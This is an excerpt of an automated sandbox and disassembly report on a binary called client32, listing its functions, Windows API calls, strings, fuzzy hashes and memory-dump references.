                                                                                                            • API ID: wsprintf
                                                                                                            • String ID: %s%s%s.bin$468325$_HF$_HW$_SW
                                                                                                            • API String ID: 2111968516-1833162749
                                                                                                            • Opcode ID: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
                                                                                                            • Instruction ID: 2d37ec8be248a08c2e3c36772f725827158d619cf10ab6990a6c8ba6e6d701e2
                                                                                                            • Opcode Fuzzy Hash: 3cadedcaca85c7d32890df03e09b4770c2ac2c560999f8ab1a4eafac2d3aae07
                                                                                                            • Instruction Fuzzy Hash: 93E09B60D2060C7FF30065588C057AFBB9C1F4931AF40C0E0FEE997A82E93494404A92
                                                                                                            Function 111430E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadStringA.USER32(00000000,0000194E,?,00000400), ref: 1114310F
                                                                                                            • wsprintfA.USER32 ref: 11143146
                                                                                                              • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
                                                                                                              • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
                                                                                                              • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
                                                                                                              • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                            • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                            • API String ID: 1985783259-2296142801
                                                                                                            • Opcode ID: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
                                                                                                            • Instruction ID: f51f52dcbd712469e4e57ed30d3ae6ecd606de78ecfb21ce2ea79b628c9a40ce
                                                                                                            • Opcode Fuzzy Hash: 50f03ae9888073d648264a02d0f2898704c8c145e373352b4e215a8d93f9feb0
                                                                                                            • Instruction Fuzzy Hash: 0B1108FAD012396BD710DAA5DD80FEAF37C9B44B18F004165FB09F7141E630AA01C7A5
                                                                                                            Function 11031200 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • wsprintfA.USER32 ref: 110312B6
                                                                                                              • Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
                                                                                                              • Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
                                                                                                              • Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
                                                                                                              • Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                            • String ID: %s%s.bin$468325$clientinv.cpp$m_pDoInv == NULL
                                                                                                            • API String ID: 4180936305-3365254120
                                                                                                            • Opcode ID: 0600f11bd2072c8e9e1e84ca6c39a1e608bde180830712b07c531cb0d481db3a
                                                                                                            • Instruction ID: 2341575681f6e1d693b2af78dd19dca744ecd147650d17c5e1ce5a0d9c930bd8
                                                                                                            • Opcode Fuzzy Hash: 0600f11bd2072c8e9e1e84ca6c39a1e608bde180830712b07c531cb0d481db3a
                                                                                                            • Instruction Fuzzy Hash: 78218EB5E00705AFD710DF65DC80BABB7E4EB89718F10856EF825D7681EA34A8108B55
                                                                                                            Function 110151E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000,00000001,1102E966,MiniDumpType,000000FF,00000000,00000000,?,?,View), ref: 110151F7
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,View,Client,Bridge), ref: 11015208
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateFileHandle
                                                                                                            • String ID: \\.\NSWFPDrv
                                                                                                            • API String ID: 3498533004-85019792
                                                                                                            • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                            • Instruction ID: 8afacd648940fbcf920c8f513ecddd5490900b3845592452e47c7361a4afad73
                                                                                                            • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                            • Instruction Fuzzy Hash: FFD0C971A420347AF231196AAC4CFCBAD0DDB427B5F210260FA3DE51C4C210489182F1
                                                                                                            Function 11015190 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9libraryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(nslsp.dll,00000000,1102E930,MiniDumpType,000000FF,00000000,00000000,?,?,View,Client,Bridge), ref: 1101519E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LibraryLoad
                                                                                                            • String ID: nslsp.dll
                                                                                                            • API String ID: 1029625771-3933918195
                                                                                                            • Opcode ID: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                            • Instruction ID: 0f85fd80076d2b40817f9a73906c67b3183ec9e0361306ecdf77c2e20fb6d995
                                                                                                            • Opcode Fuzzy Hash: 3b59623a909b284854b1b3af36d82a4f2bbb95fba0a7c60f0ac8dd87b39ed554
                                                                                                            • Instruction Fuzzy Hash: 9AC092B57022368FE3645F98AC585C6FBE4EB09612351886EE5B6D3704E6F09C408BE2
                                                                                                            Function 1105F240 Relevance: 3.2, APIs: 2, Instructions: 169COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
                                                                                                              • Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
                                                                                                              • Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507
                                                                                                            • std::exception::exception.LIBCMT ref: 1105F2E3
                                                                                                            • __CxxThrowException@8.LIBCMT ref: 1105F2F8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 1338273076-0
                                                                                                            • Opcode ID: 0e2708137e7841a047f0bf711e132c29747f48898e4f83a7bcb8bcbbdfe207f3
                                                                                                            • Instruction ID: 27c1c6abb081d98236a55b9714def59ee0ae50ea33d11c9255898d7f6f2dc0b9
                                                                                                            • Opcode Fuzzy Hash: 0e2708137e7841a047f0bf711e132c29747f48898e4f83a7bcb8bcbbdfe207f3
                                                                                                            • Instruction Fuzzy Hash: CD518DB6A00249AFDB50CF58D880E9AF7F9EB88214F04C56EEC599B341D775F901C7A1
                                                                                                            Function 11141240 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 11141160: ExpandEnvironmentStringsA.KERNEL32(75A7795C,?,00000104,75A7795C), ref: 11141187
                                                                                                              • Part of subcall function 1116067B: __fsopen.LIBCMT ref: 11160688
                                                                                                            • GetLastError.KERNEL32(?,00000000,75A7795C,00000000), ref: 11141275
                                                                                                            • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,75A7795C,00000000), ref: 11141285
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3768737497-0
                                                                                                            • Opcode ID: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
                                                                                                            • Instruction ID: 103134ba4653f8fc15402f07188d85fc6b934bc741d6c344a8ba55e5f3ec2e88
                                                                                                            • Opcode Fuzzy Hash: 095fbb323597ed630c2ce92ee5dc822cb6d747f27c5a336ad123bdd945b58385
                                                                                                            • Instruction Fuzzy Hash: 1A11E5B6A00215ABDB119F94C9C0E6FF378EB45A69F304165ED04D7200E775BD0287A3
                                                                                                            Function 1113F3A0 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110C55B,75A78400,?,?,111414FF,00000000,CSDVersion,00000000,00000000,?), ref: 1113F3C0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000007.00000002.3304079708.0000000011001000.00000020.00000001.01000000.0000000E.sdmp, Offset: 11000000, based on PE: true
                                                                                                            • Associated: 00000007.00000002.3304051388.0000000011000000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304252601.000000001118F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304306206.00000000111DC000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304334547.00000000111EB000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000111F1000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011257000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001127C000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011283000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.000000001128A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011297000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112A7000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112AD000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.00000000112D9000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            • Associated: 00000007.00000002.3304359735.0000000011325000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3660427363-0
                                                                                                            • Opcode ID: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                            • Instruction ID: 5fbfdb2e62506a22be8d6102f6026bab3dbcb22e3eaadfb442edbe5e81d15758
                                                                                                            • Opcode Fuzzy Hash: a232fc1abe2ed2d7d844c38d6296ee0920c29362aec6298465a62cb418f01d82
                                                                                                            • Instruction Fuzzy Hash: C711B4717242475BE7118D14E590AAEFB6AEFC523EF20812AE59647908C2319443C763